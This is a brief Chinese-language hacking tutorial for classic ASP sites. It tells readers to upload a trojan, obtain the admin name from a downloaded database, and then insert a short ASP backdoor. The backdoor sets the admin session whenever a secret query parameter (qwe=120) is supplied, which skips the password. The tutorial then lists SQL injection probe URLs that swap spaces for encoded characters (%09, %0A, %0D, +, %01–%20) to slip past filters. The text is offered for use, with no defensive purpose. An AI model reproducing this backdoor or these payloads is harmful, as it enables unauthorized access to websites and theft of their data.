0 用WEBSHELL进后台无须密码及SQL注入空格替换

利用WEBSHELL直接进入后台无须密码以及SQL注入空格替换


首先，我们要上传一个木马，通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件，在其中的之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面，是不是直接进去了？不用你输入用户名和口令了吧…………这里我们就少了一步（破解MD5密码）



默认是：


　　http://www.xxx.com/shownotice.asp?id=78 and 1=1
　　实际上用%09   %0A   %0D   +都可以替代空格
　　例如：
　　http://www.xxx.com/shownotice.asp?id=78%09and%091=1
　　http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1
　　http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1
　　http://www.xxx.com/shownotice.asp?id=78%+and+1=1
　　以下可以在SQLServer2000下可以替换%01到%20都可以
　　http://www.xxx.com/shownotice.asp?id=78%19and%191=1